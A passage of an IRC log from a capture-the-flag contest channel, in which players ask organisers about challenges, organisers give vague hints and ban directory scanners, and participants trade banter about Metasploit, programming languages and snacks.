  6831. (00:55:09) (+mserrano) tomcr00se: no
  6832. (00:55:18) (tomcr00se) on http://portal.essolutions.largestctf.com/?
  6833. (00:55:20) (ricky) Hahaha
  6834. (00:55:21) (+mserrano) no
  6835. (00:55:27) (nopple) lol that hint would have saved me a bunch of time on kpop earlier
  6836. (00:55:39) (cylindrical) mserrano: so i have to use another approach such as sqli?
  6837. (00:55:42) (+mserrano) nopple: ... yeah... I didn't realize people were gonna go for that
  6838. (00:55:50) (+mserrano) cylindrical: v0v
  6839. (00:56:11) (nopple) mserrano: yeah the source kind of hinted towards it, that's the only reason i fixated on it
  6840. (00:57:14) (tomcr00se) is there a page on http://portal.essolutions.largestctf.com/ i can't find?
  6841. (00:57:16) (+mserrano) "I was bored, maybe it's time to put something in my mouth again"
  6842. (00:57:28) (+mserrano) -- anonymous person in this channel
  6843. (00:57:45) (ricky) tomcr00se: There are no relevant pages on http://portal.essolutions.largestctf.com/ that we don't don't give you
  6844. (00:57:53) (ricky) Er, ignore the double negative
  6845. (00:57:53) (ricky) Haha
  6846. (00:57:55) ••• jOin: (dkohlbre) ([email protected])
  6847. (00:57:55) (+mserrano) DON'T DON'T
  6848. (00:58:07) ••• qUit: (livinded) ([email protected]) Quit: WeeChat 0.4.3
  6849. (00:58:09) (tomcr00se) DIRBUSTER
  6850. (00:58:13) (ricky) BAN
  6851. (00:58:13) (robbje) Don't not use dirbuster
  6852. (00:58:29) (tomcr00se) hmm, i see what you did there
  6853. (00:59:30) (+mserrano) tomcr00se: do you have a vps in russia or someshit
  6854. (00:59:32) (ricky) tomcr00se: Oh did you find anything interesting? Interested in hearing :-)
  6855. (00:59:41) (ricky) Unless you were talking about me banning the dirbuster, hehe
  6856. (01:00:01) (robbje) "vps" *cough*
  6857. (01:00:06) (+mserrano) lol
  6858. (01:00:27) (tomcr00se) i love the dirbuster
  6859. (01:00:53) ••• jOin: (areke_) ([email protected])
  6860. (01:01:30) (areke_) hey guys
  6861. (01:01:37) (areke_) what's the difficulty level compared to picoctf?
  6862. (01:01:43) (+mserrano) um
  6863. (01:01:44) (+mserrano) hard
  6864. (01:02:01) (+mserrano) quite a bit harder than pico
  6865. (01:02:03) (Yen1) on 'graphs', is the included ciphertext definitely correct?
  6866. (01:02:04) (+mserrano) Yen1: yes
  6867. (01:02:05) ••• qUit: ([SF]testdata) (75c1a957@gateway/web/freenode/ip.117.193.169.87) Ping timeout: 240 seconds
  6868. (01:02:20) (areke_) mserrano: haha ok thanks
  6869. (01:02:27) (Yen1) I'm getting that it's not a valid zlib stream
  6870. (01:02:29) (areke_) and picoctf is gonna go on again this year right? :D
  6871. (01:02:32) (Yen1) which is a bit odd
  6872. (01:02:42) (+mserrano) areke_: in october
  6873. (01:04:18) (areke_) mserrano: thank you! i'll be sure to compete (hopefully not solo the next time)
  6874. (01:04:20) ••• pArt: (16WAAD756) ([email protected])
  6875. (01:05:07) (jmgrosen) areke_: picoctf sure is a good starting point, though! :)
  6876. (01:05:39) (18VAAD0FH) SOLO sucks
  6877. (01:05:52) (jmgrosen) eh, that's true
  6878. (01:06:15) (jmgrosen) the rest of my team is going to be gone next year to colleges :(
  6879. (01:06:29) (+mserrano) jmgrosen: any of them CMU-bound?
  6880. (01:06:40) ••• jOin: (slinkyman) ([email protected])
  6881. (01:06:46) (jmgrosen) mserrano: unfortunately not; the only one that was considering it didn't get in :/
  6882. (01:06:51) (+mserrano) =\
  6883. (01:07:01) ••• jOin: (whois) ([email protected])
  6884. (01:08:10) ••• jOin: (yohanes) ([email protected])
  6885. (01:08:34) ••• qUit: (NotoriousHUB) ([email protected]) Read error: Connection reset by peer
  6886. (01:09:44) (|x_x|) CMU? That's way too far north of the Mason Dixon.
  6887. (01:09:54) • ricky continues hoping for bronies solves :-)
  6888. (01:09:57) (+mserrano) |x_x|: wut.
  6889. (01:11:25) (ricky) worthless hint: automated tools will probably not help for pctf problems
  6890. (01:11:29) (cylindrical) and does mtpox require bruteforce?
  6891. (01:11:34) (ricky) At least not bronies :-)
  6892. (01:11:52) (dwlewis) cylindrical, nope
  6893. (01:11:53) (tomcr00se) ricky: don't worry, i'll solve it :)
  6894. (01:11:53) (+frozencemetery) |x_x|: how could you be less north of the mason dixon line without being north?
  6895. (01:11:53) (ricky) tomcr00se: :-D
  6896. (01:12:04) ••• qUit: (x56) ([email protected]) Quit: Peace
  6897. (01:12:04) • tomcr00se is getting dat webkit exploit ready
  6898. (01:12:04) ••• qUit: (areke_) ([email protected]) Quit: areke_
  6899. (01:12:16) (ricky) tomcr00se: :-( seriously?
  6900. (01:12:19) (ricky) Solve it the right way!
  6901. (01:12:39) ••• jOin: (x56) ([email protected])
  6902. (01:12:49) (tomcr00se) ricky: are you checking your logs? i'm totally kidding
  6903. (01:13:04) ••• qUit: (jmgrosen) ([email protected]) Quit: jmgrosen
  6904. (01:13:16) (ricky) I am checking logs, and didn't see your IP in the list of people who made it past the first step
  6905. (01:13:42) ••• jOin: (CaIlou) ([email protected])
  6906. (01:14:43) (+clockish) tomcr00se: if you still want to throw an 0day I bravely volunteer to visit any link you send in the modern browser + os of your choice :P
  6907. (01:15:02) ••• qUit: (hellok) ([email protected]) Ping timeout: 252 seconds
  6908. (01:15:15) (+clockish) and phantomjs is not a modern browser :P
  6909. (01:15:23) (+frozencemetery) ur not a modern browser
  6910. (01:15:24) (cylindrical) dwlewis: isn't it impossible to solve mtpox without bruteforce?
  6911. (01:15:33) ••• jOin: (snoopybbt) ([email protected])
  6912. (01:15:54) ••• qUit: (Zibro) ([email protected]) Ping timeout: 258 seconds
  6913. (01:16:59) (dwlewis) cylindrical, there is an attack that uses only information that is given and doesn't require brute force
  6914. (01:17:34) ••• jOin: (hellok) ([email protected])
  6915. (01:17:34) ••• qUit: (darklapu) ([email protected]) Quit: darklapu
  6916. (01:17:44) (bobsteam) hmm... brony is fun
  6917. (01:17:52) (bobsteam) I like so far
  6918. (01:18:15) ••• jOin: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41)
  6919. (01:18:23) (ricky) bobsteam: :-D
  6920. (01:19:22) (bobsteam) I think one of the things I love/hate so much about ctf is when things are really obvious or really not obvious lol (cause theres so much variation among players and whats fresh in our minds and all that jazz ;)
  6921. (01:19:27) ••• jOin: (LouTerrailloune) ([email protected])
  6922. (01:19:35) ••• qUit: (cylindrical) (76f3c596@gateway/web/freenode/ip.118.243.197.150) Ping timeout: 240 seconds
  6923. (01:19:45) (ricky) Hoping you found some interesting nonobvious things :-)
  6924. (01:19:55) (ricky) So what's everyone's favorite pony captcha?
  6925. (01:20:04) (ricky) Mine is Pricess Celestia
  6926. (01:20:33) (|x_x|) The one from that certain website where I can perfectly match the photo to the character name.
  6927. (01:20:35) ••• qUit: (Cimmi) ([email protected]) Ping timeout: 240 seconds
  6928. (01:20:58) (ricky) Spoilers: http://mlp.wikia.com/wiki/List_of_ponies - memorize them all!
  6929. (01:21:04) (|x_x|) >_>
  6930. (01:21:14) (|x_x|) Bad spoiler! People need to do their recon.
  6931. (01:21:23) (ricky) Oops, sorry :-P
  6932. (01:21:45) (snoopybbt) i've been working on reekee, it was nice
  6933. (01:23:45) • ricky blocks another dirbuster - seriously, Russia
  6934. (01:24:04) (|x_x|) I've been jumping all over the place like a toddler doing lines of sugar off a seesaw on a summer's day.
  6935. (01:24:10) (|x_x|) And by that I mean, darn it's hard to focus sometimes.
  6936. (01:24:26) ••• qUit: (vap0r) ([email protected]) Quit: Leaving
  6937. (01:25:47) (haoz) need to obtain $SECRET to solve mtpox ?
  6938. (01:25:59) (|x_x|) That's my line of thought.
  6939. (01:26:19) (haoz) :(
  6940. (01:26:29) (inter) selling ricky's naked pics for 2BTC
  6941. (01:26:34) (inter) pm me
  6942. (01:26:42) ••• jOin: (mapleray) ([email protected])
  6943. (01:27:00) (+mserrano) inter: I hear tylerni7 wants them
  6944. (01:27:06) (dct1_) I only have plaidcoins
  6945. (01:27:08) (|x_x|) inter: 2BTC? How about a cracker instead?
  6946. (01:27:18) (inter) i also take keys
  6947. (01:27:24) (inter) dota2 keys
  6948. (01:27:32) (inter) :trollface:
  6949. (01:28:16) (snoopybbt) selling reekee for 2 btc
  6950. (01:28:21) (snoopybbt) TROLOLOLOLOLOLOLOLO
  6951. (01:28:29) (snoopybbt) :P
  6952. (01:28:52) (snoopybbt) (just kidding)
  6953. (01:28:52) (|x_x|) Selling sanity check for a cookie.
  6954. (01:29:28) (shadghost) fucking browsers preventing me from scripting into a iframe
  6955. (01:29:29) (+frozencemetery) (sell your soul for a cookie?)
  6956. (01:29:54) (|x_x|) frozencemetery: I'd not think twice about it if they were girl scout cookies.
  6957. (01:29:56) • shadghost hats browsers and the fact that they are trying to do security
  6958. (01:30:09) ••• jOin: (jmgrosen) ([email protected])
  6959. (01:30:18) (+frozencemetery) aww shit lemon girl scout cookies would punish about now
  6960. (01:30:59) (|x_x|) I had girl scout cookies for the first time this year. I unfortunately didn't buy enough to last me the whole year.
  6961. (01:31:10) (zoku) should we expect randomization for ezhp?
  6962. (01:31:15) (zoku) I'm guessing no because 'ez', but...
  6963. (01:31:22) (+frozencemetery) don't feel too bad; it's not possible to buy enough to last the whole year
  6964. (01:31:54) (+mserrano) zoku: ASLR is on.
  6965. (01:32:05) (zoku) FYI, Yolanda is PMing me to trade key/solutions
  6966. (01:32:20) (zoku) damnit, thanks mserrano
  6967. (01:32:27) (pipecork) hey mods i can't find a metasploit module for mtpox... is it even solvable?
  6968. (01:32:33) (zoku) er..what about heap mserrano?
  6969. (01:32:45) (zoku) I mean..nevermind
  6970. (01:32:50) • zoku <- needs sleeep
  6971. (01:32:51) (oceanx) pipecork: metasploit? wut!? :P btw it is solvable indeed :)
  6972. (01:33:03) (zoku) haha, trying to ctf with metasploit
  6973. (01:33:25) (|x_x|) Girl scout cookies are amazing. You start off biting into that first cookie suddenly overcome with excitement as waves of endorphins wash over your body. And then moments later you realize you just ate the last one and suddenly feel filthy and worthless for eating a whole tray of girl scout cookies.
  6974. (01:33:26) • oceanx needs sleep too
  6975. (01:33:37) (pipecork) oceanx: you call yrself a security professional and you've never heard of metasploit??
  6976. (01:34:00) (oceanx) pipecork: you don't need metasploit for mtpox :)
  6977. (01:34:01) (+mserrano) I once installed metasploit during a CTF.
  6978. (01:34:09) (+mserrano) I very quickly regretted my decision.
  6979. (01:34:14) (+mserrano) Metasploit: not even once.
  6980. (01:34:19) (+clockish) python is always the answer
  6981. (01:34:21) (+clockish) never ruby
  6982. (01:34:25) • +frozencemetery starts a flamewar about the evils of ruby
  6983. (01:34:28) (+clockish) no metasploit #2014
  6984. (01:34:28) (pipecork) clockish: is that a hint???
  6985. (01:34:30) (+frozencemetery) oh hey, got beaten to that :)
  6986. (01:34:32) (inter) python is always better than ruby
  6987. (01:34:38) (inter) but CLOCKISH WHY YOU NO LET ME PIPE
  6988. (01:34:39) (+clockish) pipecork: no, I'm ragging on metaslpoit
  6989. (01:34:40) (dkohlbre) mserrano: I did that, then I tried to use it to generate shellcode and it failed miserably. So I wrote some shellscripts to do it instead :P
  6990. (01:34:42) (|x_x|) Don't you mean Perl?
  6991. (01:34:42) (oceanx) mserrano: lol true story, I do hate metasploit with a passion :D
  6992. (01:34:44) (inter) the jail2stronk
  6993. (01:34:44) • |x_x| dodges.
  6994. (01:34:50) (pipecork) clockish: i know. i know.
  6995. (01:34:54) (ryan-c) perl is awsome
  6996. (01:35:01) (+frozencemetery) haha perl
  6997. (01:35:04) (inter) perl
  6998. (01:35:04) (inter) is
  6999. (01:35:05) (inter) slow
  7000. (01:35:07) (+mserrano) dkohlbre: I tried to install during CSAW. A bunch of people gathered to watch me try to use metasploit for the first time ever
  7001. (01:35:09) (oceanx) perl
  7002. (01:35:09) (pipecork) did i just simultaneously start a metasploit flame AND a languages war?
  7003. (01:35:09) (oceanx) is
  7004. (01:35:11) (oceanx) evil
  7005. (01:35:13) (+clockish) pipecork: well, I guess ragging on metasploit is a hint in a way
  7006. (01:35:14) (+mserrano) spoiler: I did not successfully use metasploit
  7007. (01:35:37) ••• pArt: (delusions) ([email protected])
  7008. (01:35:41) (ryan-c) perl is awesome for one off hacks
  7009. (01:35:42) (dkohlbre) mserrano: rofl, I did it like 2-3 ctfs ago with people waiting for some x64 shellcode from me :P
  7010. (01:35:47) ••• jOin: (dracu) ([email protected])
  7011. (01:36:08) ••• jOin: (nonomyfhmv) ([email protected])
  7012. (01:36:28) ••• qUit: (jmgrosen) ([email protected]) Ping timeout: 250 seconds
  7013. (01:37:00) (nonomyfhmv) itz fun
  7014. (01:37:05) (oceanx) inter: and you can't even write gdb/ida/windbg/whatever plugins in ruby, python ftw! :P
  7015. (01:37:25) (|x_x|) Ruby is evil.
  7016. (01:37:45) (dkohlbre) but can you put python on rails. i hear rails are very good for languages
  7017. (01:37:57) (dkohlbre) makes them all web scale
  7018. (01:38:17) (+clockish) as the wise crowell once informed me, ruby is crazy japanese python from space
  7019. (01:38:36) (oceanx) |x_x|: I do not agree, perl is evil ...ruby sucks! :P
  7020. (01:38:51) (|x_x|) Does Python use mongodb? Becuse mongodb is web scale.
  7021. (01:38:54) (oceanx) clockish: lol :D
  7022. (01:39:03) (ryan-c) ffffffffffffffffffuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
  7023. (01:39:05) (oceanx) |x_x|: motor and pymongo :)
  7024. (01:39:13) (+frozencemetery) if /dev/null is web scale then I will use it
  7025. (01:39:19) (|x_x|) <3
  7026. (01:40:14) ••• jOin: (orto) ([email protected])
  7027. (01:40:20) (+clockish) http://devnull-as-a-service.com
  7028. (01:41:04) (orto) hi are there ops around, i want to see if i am right track for challenge
  7029. (01:41:18) (zoku) (gdb) c
  7030. (01:41:19) (zoku) Continuing.
  7031. (01:41:19) (zoku) process 14256 is executing new program: /bin/dash
  7032. (01:41:20) (zoku) :D
  7033. (01:41:33) (|x_x|) Rainbow Rash?
  7034. (01:41:34) (+clockish) zoku: poppin shellz, yo
  7035. (01:41:56) (+clockish) orto: which challenge?
  7036. (01:42:16) (orto) web 150
  7037. (01:42:28) (+clockish) which one is that?
  7038. (01:42:43) (orto) mtpox
  7039. (01:43:04) (pipecork) don't bother using metasploit
  7040. (01:44:12) (mike_pizza) what?? are you telling me i wiped my ubuntu install and got kali linux for NOTHING?
  7041. (01:44:47) (sibios) no, not nothing. Just a SHNAZZY new background! :D
  7042. (01:45:04) (|x_x|) Which makes it all worth using Kali linux.
  7043. (01:45:07) (pipecork) i tried installing kali once but my antivirus said it was malware. don't trust it!!!
  7044. (01:45:15) (+frozencemetery) the fuck would you use kali :|
  7045. (01:45:26) ••• pArt: (mapleray) ([email protected])
  7046. (01:45:29) (arthurdent) frozencemetery: well it's hard to install metasploit on ohter OSes
  7047. (01:45:37) (+frozencemetery) ... okay?
  7048. (01:45:38) (pipecork) frozencemetery: all in the spirit of the game
  7049. (01:45:39) (+frozencemetery) like
  7050. (01:45:48) (orto) clockish: i'm guessing nobody is around right now for that challenge?
  7051. (01:45:51) (+frozencemetery) but don't you people know about virt?
  7052. (01:46:03) (arthurdent) is that a hacker?
  7053. (01:46:03) ••• qUit: (nonomyfhmv) ([email protected]) Remote host closed the connection
  7054. (01:46:04) (mike_pizza) enlighten me
  7055. (01:46:11) (orto) with all this broken on freenode i'm not surprised
  7056. (01:46:14) (pipecork) i think i met virt once
  7057. (01:46:21) (+clockish) orto: sorry, got distracted. PM either me or mserrano about that.
  7058. (01:46:21) (|x_x|) Is virt web scale?
  7059. (01:46:24) (arthurdent) im pretty sure i follow him on twitter
  7060. (01:46:27) (oceanx) lol
  7061. (01:46:49) (pipecork) Virt As A Service
  7062. (01:46:53) (sibios) ricky, were people running dirbuster against bronies (target site) getting the ban hammer?
  7063. (01:47:13) ••• qUit: (zTrix) (~zTrix@2402:f000:5:7a01:343f:c90d:c71f:8530) Ping timeout: 252 seconds
  7064. (01:47:18) (ricky) sibios: Yeah, give me your IP if you need to be unbanned
  7065. (01:47:25) (sibios) oh, not banned
  7066. (01:47:28) (ricky) Oh, OK
  7067. (01:47:33) (sibios) just checking so I can keep from being banned
  7068. (01:47:36) (ricky) :-)
  7069. (01:47:40) (arthurdent) is dirbuster like metasploit? or virt?
  7070. (01:47:43) (ricky) dirbuster isn't useful anyway
  7071. (01:47:50) (|x_x|) dirbuster is web scale.
  7072. (01:47:57) (ricky) It just spams logs and sometimes makes things worse for other players
  7073. (01:47:59) ••• jOin: (Xteven) ([email protected])
  7074. (01:48:22) (sibios) assumed as much, just thinking about how I can move forward when beef isn't keeping persistance on the bot :(
  7075. (01:48:30) (pipecork) TIL: drbuster isn't actually a cola
  7076. (01:48:41) (pipecork) it's 23 flavors make it very unique
  7077. (01:48:46) (arthurdent) its not one of those offbrand ones?
  7078. (01:49:30) (sibios) and zero knowledge of the target w/o session
  7079. (01:49:48) ••• qUit: (DKay) (uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc) Quit: Connection closed for inactivity
  7080. (01:50:35) ••• qUit: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35) Ping timeout: 240 seconds
  7081. (01:51:12) (tjbecker_) who can I ask about kpop?
  7082. (01:51:43) (auscompgeek) when does the CTF end?
  7083. (01:51:44) ••• jOin: (abc_) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
  7084. (01:51:45) (mrsmith67) can i ask someone about kappa?
  7085. (01:51:49) (mrsmith67) i have execution...
  7086. (01:51:57) (+mserrano) tjbecker_: ping me
  7087. (01:52:48) (Xteven) where can we report unintended bugs?
  7088. (01:52:53) (Xteven) or to whom?
  7089. (01:53:00) (sibios) auscompgeek, 5PM EDT Sunday, April 13
  7090. (01:53:01) (+frozencemetery) Xteven: pm
  7091. (01:53:07) (inter) CLOCKISH
  7092. (01:53:07) (inter) YO
  7093. (01:53:07) (inter) FUCK
  7094. (01:53:22) (+clockish) WAT
  7095. (01:53:30) (abc_) mtpox ?
  7096. (01:53:59) (inter) DUDE
  7097. (01:54:01) (inter) FUK
  7098. (01:54:02) (inter) FUK
  7099. (01:54:07) (inter) I THINK I JUST SAW THE LIGHT
  7100. (01:54:09) (inter) IN THE JAIL
  7101. (01:55:24) ••• qUit: (c671m) ([email protected]) Quit: Changing server
  7102. (01:55:31) ••• jOin: (wtbw) ([email protected])
  7103. (01:55:37) ••• jOin: (crash) ([email protected])
  7104. (01:55:45) (arthurdent) you're doing this ctf from jail?
  7105. (01:55:47) (arthurdent) are you in for hacking?
  7106. (01:55:53) ••• jOin: (mttpgrm) ([email protected])
  7107. (01:56:22) (+frozencemetery) wow, such hardk0re
  7108. (01:56:59) (|x_x|) I hope they are hacking by manipulating signals through a payphone handset using a tape recorder.
  7109. (01:57:05) ••• qUit: (43UAABJS1) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34) Ping timeout: 240 seconds
  7110. (01:57:38) (pipecork) phreaky
  7111. (01:57:49) (auscompgeek) sibios: ah, ok.
  7112. (01:58:37) (arthurdent) |x_x|: i did that once
  7113. (02:00:54) (arthurdent) whoa somebody just mentioned virt in another hacker channel
  7114. (02:00:57) (arthurdent) he must be more famous than i thought
  7115. (02:00:57) ••• jOin: (zTrix) ([email protected])
  7116. (02:01:17) ••• jOin: (chrissing) ([email protected])
  7117. (02:01:41) ••• qUit: (trelgak) ([email protected]) Ping timeout: 276 seconds
  7118. (02:05:52) ••• qUit: (MavJS) ([email protected]) Quit: Reconnecting
  7119. (02:05:57) ••• qUit: (chrissing) ([email protected]) Ping timeout: 250 seconds
  7120. (02:06:13) ••• jOin: (MavJS) ([email protected])
  7121. (02:06:59) ••• qUit: (Comrade_Badger) ([email protected]) Ping timeout: 240 seconds
  7122. (02:07:29) ••• pArt: (16WAAD8T9) ([email protected]) "Leaving"
  7123. (02:08:23) (stypr_irccloud) internet crashed
  7124. (02:08:26) (stypr_irccloud) f...
  7125. (02:08:42) (arthurdent) the whole internet?
  7126. (02:08:47) (arthurdent) seems fine from here
  7127. (02:08:49) (+frozencemetery) you broke it
  7128. (02:09:03) (stypr_irccloud) my internet i meant
  7129. (02:09:14) (stypr_irccloud) seems like i didnt pay my bill
  7130. (02:13:39) ••• qUit: (orto) ([email protected]) Quit: leaving
  7131. (02:14:03) ••• jOin: (orto) ([email protected])
  7132. (02:14:38) ••• jOin: (zTrix_) (~zTrix@2402:f000:d:8001:2969:4da7:2b93:32a0)
  7133. (02:14:40) (whois) bronies works?
  7134. (02:15:05) ••• qUit: (abc_) (b44ac723@gateway/web/freenode/ip.180.74.199.35) Ping timeout: 240 seconds
  7135. (02:15:23) (18VAAD0FH) doing this solo is not fun, maybe next year will be better
  7136. (02:15:35) (18VAAD0FH) RED TEAM...OUT
  7137. (02:15:38) (+mserrano) whois: pm
  7138. (02:15:59) ••• qUit: (zTrix) ([email protected]) Ping timeout: 276 seconds
  7139. (02:16:19) ••• qUit: (knuckles) ([email protected]) Remote host closed the connection
  7140. (02:17:06) ••• jOin: (abcd_) (7b886a50@gateway/web/freenode/ip.123.136.106.80)
  7141. (02:17:21) ••• qUit: (gbarboza) ([email protected]) Changing host
  7142. (02:17:21) ••• jOin: (gbarboza) (~gbarboza@unaffiliated/sonicvanajr)
  7143. (02:17:55) ••• jOin: (ChanServ) (ChanServ@services.)
  7144. (02:17:56) ••• mOde: (sendak.freenode.net) sets (+o ChanServ)
  7145. (02:17:56) ••• mOde: (ChanServ) sets (+v gbarboza)
  7146. (02:18:10) ••• qUit: (dug) ([email protected]) Changing host
  7147. (02:18:11) ••• jOin: (dug) (~dug@unaffiliated/dug)
  7148. (02:18:11) ••• nIck: (Sin__) is now known as (Guest91297)
  7149. (02:18:11) ••• nIck: (ricky) is now known as (Guest97836)
  7150. (02:18:11) ••• nIck: (crash) is now known as (Guest26684)
  7151. (02:18:11) ••• nIck: (x56) is now known as (Guest64110)
  7152. (02:18:12) ••• nIck: (dnivra) is now known as (Guest19451)
  7153. (02:18:12) ••• nIck: (Amnesia) is now known as (Guest80055)
  7154. (02:18:13) ••• nIck: (ikari) is now known as (Guest35713)
  7155. (02:18:14) ••• qUit: (rray) ([email protected]) Changing host
  7156. (02:18:14) ••• jOin: (rray) (~rray@unaffiliated/rray)
  7157. (02:18:14) ••• nIck: (MavJS) is now known as (Guest16009)
  7158. (02:18:19) ••• jOin: (DrunkenPanda) (~mpex@unaffiliated/drunkenpanda)
  7159. (02:18:33) ••• qUit: (wtbw) ([email protected]) Changing host
  7160. (02:18:33) ••• jOin: (wtbw) (~wtbw@unaffiliated/wtbw)
  7161. (02:18:34) ••• qUit: (bool101) ([email protected]) Changing host
  7162. (02:18:34) ••• jOin: (bool101) (~bool@unaffiliated/bool101)
  7163. (02:19:10) ••• nIck: (Guest16009) is now known as (MavJS)
  7164. (02:19:16) ••• qUit: (MavJS) ([email protected]) Changing host
  7165. (02:19:17) ••• jOin: (MavJS) (~maverick@fedora/MavJS)
  7166. (02:20:03) ••• qUit: (dct1_) ([email protected]) Remote host closed the connection
  7167. (02:20:11) ••• mOde: (ChanServ) sets (+v cai_)
  7168. (02:20:42) (ryan-c) can anyone answer a quick question about wheeeee?
  7169. (02:20:50) ••• nIck: (Guest97836) is now known as (ricky)
  7170. (02:21:00) (+clockish) ryan-c: pm mserrano
  7171. (02:21:07) ••• qUit: (ricky) ([email protected]) Changing host
  7172. (02:21:07) ••• jOin: (ricky) (~ricky@fedora/ricky)
  7173. (02:21:07) ••• mOde: (ChanServ) sets (+v ricky)
  7174. (02:21:09) (mrsmith67) for bronies - by client side exploits
  7175. (02:21:11) (mrsmith67) do you mean xss?
  7176. (02:21:16) (+mserrano) mrsmith67: ?
  7177. (02:21:17) ••• qUit: (inter) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Would you like to know more?
  7178. (02:21:26) ••• mOde: (ChanServ) sets (+v cai_)
  7179. (02:21:33) (mrsmith67) you say it shouldnt be solved by client side exploits
  7180. (02:21:35) (+mserrano) mrsmith67: we do not expect you to exploit webkit
  7181. (02:21:37) (ryan-c) mrsmith67: I think by 'client side exploits' they mean 'browser 0day'
  7182. (02:21:40) (mrsmith67) oh
  7183. (02:21:40) (+mserrano) yeah
  7184. (02:21:41) (mrsmith67) i see
  7185. (02:22:11) (+clockish) the problem being that there are some browser 100days that could be adapted...
  7186. (02:22:13) ••• jOin: (dct1) ([email protected])
  7187. (02:22:13) (mrsmith67) ok
  7188. (02:22:16) (mrsmith67) thats super unclear, heh
  7189. (02:22:18) (+clockish) but that's not an easy way to do the problem
  7190. (02:22:27) ••• jOin: (stk|) ([email protected])
  7191. (02:22:44) (bobsteam) theres an easy way? =P
  7192. (02:22:54) (+mserrano) easier than writing a webkit exploit.
  7193. (02:23:04) (bobsteam) hehe
  7194. (02:23:07) (+clockish) lol
  7195. (02:24:04) ••• qUit: (cybercybercyber) ([email protected]) Quit: cybercybercyber
  7196. (02:24:31) ••• jOin: (razvanc) ([email protected])
  7197. (02:25:16) ••• qUit: (j0f) ([email protected]) Changing host
  7198. (02:25:16) ••• jOin: (j0f) (~amirreza@unaffiliated/j0f)
  7199. (02:25:45) (+ricky) ANNOUNCE: Bronies was broken (the admin wasn't logging onto the internal portal properly). Please retry your exploits. Apologies for the inconvenience
  7200. (02:27:05) (+mserrano) andddd there goes part 1
  7201. (02:27:09) (+ricky) Congrats to tomcr00se on part 1 :-)
  7202. (02:27:32) (+clockish) tomcr00se!
  7203. (02:28:20) ••• qUit: (_bcc) ([email protected]) Ping timeout: 245 seconds
  7204. (02:29:03) ••• nIck: (Guest91297) is now known as (Sin__)
  7205. (02:29:23) (tomcr00se) grr harry potter is frustrating
  7206. (02:30:07) (+ricky) Part 2's always there
  7207. (02:30:15) (+clockish) tomcr00se: and worth less points than bronies2!
  7208. (02:30:23) (tomcr00se) i have feels that might be worse
  7209. (02:30:27) (+mserrano) lol
  7210. (02:30:32) -marienz- [Global Notice] Services are back, running a recent backup of the database. If you (automatically) identified to nickserv without using SASL while services were split, your password might be compromised. Please change your nickserv password (/msg nickserv help set password) if this applies to you. The misconfiguration allowing this has been fixed. If you have questions, ask in #freenode. Thanks!
  7211. (02:30:34) ••• jOin: (mapleray) ([email protected])
  7212. (02:30:40) (+clockish) also, gotta play the breakthru game
  7213. (02:30:48) (snoopybbt) hints on harry potter ?
  7214. (02:31:06) (+clockish) snoopybbt: hints will go on the website if any are released
  7215. (02:31:13) (snoopybbt) clockish: ok :)
  7216. (02:31:27) (iZsh) why are ppl always asking for hints after trying 10s
  7217. (02:31:44) ••• jOin: (Cimmi) ([email protected])
  7218. (02:31:45) (bool101) tomcr00se very much agree with you on harry_potter
  7219. (02:34:39) ••• jOin: (gameredan) ([email protected])
  7220. (02:34:42) (18VAAD0FH) he is just a boy, a not so gifted boy, and he has such a task at hand, taking on Tom Riddle and all
  7221. (02:35:04) ••• nIck: (gameredan) is now known as (Guest78627)
  7222. (02:35:45) ••• qUit: (phiber__) ([email protected]) Read error: Connection reset by peer
  7223. (02:38:40) ••• jOin: ([GoN]Jakkdu) ([email protected])
  7224. (02:38:50) ([GoN]Jakkdu) wow
  7225. (02:39:28) ••• jOin: ([GoN]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156)
  7226. (02:40:47) (tomcr00se) doge_stege hint?
  7227. (02:41:18) (poppopret) tomcr00se asking for hints
  7228. (02:41:20) (poppopret) wat
  7229. (02:41:29) (+mserrano) tomcr00se: Doge. Stege.
  7230. (02:43:20) (+frozencemetery) y'all nerds don't know about norse gods
  7231. (02:43:37) (+mserrano) tomcr00se: First, you laugh at doge. Then, you doge stege.
  7232. (02:44:20) (+frozencemetery) then you become doge
  7233. (02:44:30) (18VAAD0FH) wow a hint haha
  7234. (02:44:40) (18VAAD0FH) someone is generous
  7235. (02:44:49) (poppopret) is that really a hint? lol
  7236. (02:44:50) (18VAAD0FH) norse gods like that gamer er gamr
  7237. (02:45:00) (robbje) who can I ask about tenement?
  7238. (02:45:22) ••• jOin: (wooyaggo) ([email protected])
  7239. (02:45:45) (+frozencemetery) poppopret: I mean, freya is the name of a problem that's open...
  7240. (02:45:45) ••• jOin: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99)
  7241. (02:46:17) (jduck) scoreboard takes 500M of ram lol.
  7242. (02:46:30) (+mserrano) jduck: lolll
  7243. (02:46:34) (+mserrano) too much ajax
  7244. (02:46:58) (robbje) anyone? :)
  7245. (02:46:59) (jduck) oh nm, thats the play board. a second ago the scoreboard was taking 1.2gb
  7246. (02:47:06) (jduck) i reloaded and its not so bad
  7247. (02:47:12) (+mserrano) lolllllllllll
  7248. (02:47:30) (+mserrano) robbje: um
  7249. (02:47:37) (+mserrano) ping me briefly
  7250. (02:47:40) (+mserrano) but I don't know very much
  7251. (02:50:43) ••• jOin: (DonnchaC) ([email protected])
  7252. (02:52:04) ••• jOin: (phiber__) ([email protected])
  7253. (02:54:35) ••• qUit: (asdfasdgag) (6cab7303@gateway/web/freenode/ip.108.171.115.3) Ping timeout: 240 seconds
  7254. (02:54:36) ••• pArt: (mapleray) ([email protected])
  7255. (02:54:57) ••• nIck: (18VAAD0FH) is now known as (asmoday)
  7256. (02:56:22) ••• jOin: (installation) (76f3c589@gateway/web/freenode/ip.118.243.197.137)
  7257. (02:56:31) ••• jOin: (toto) ([email protected])
  7258. (02:56:55) ••• nIck: (toto) is now known as (Guest1734)
  7259. (02:57:37) (bobsteam) woot bronies!
  7260. (02:57:53) (+ricky) Nice!
  7261. (03:02:06) (iZsh) someone fully solved it?
  7262. (03:03:24) (robbje) wtf. tenement?
  7263. (03:03:49) (tomcr00se) omg childish gambino mentioned weev
  7264. (03:05:35) ••• qUit: (installation) (76f3c589@gateway/web/freenode/ip.118.243.197.137) Ping timeout: 240 seconds
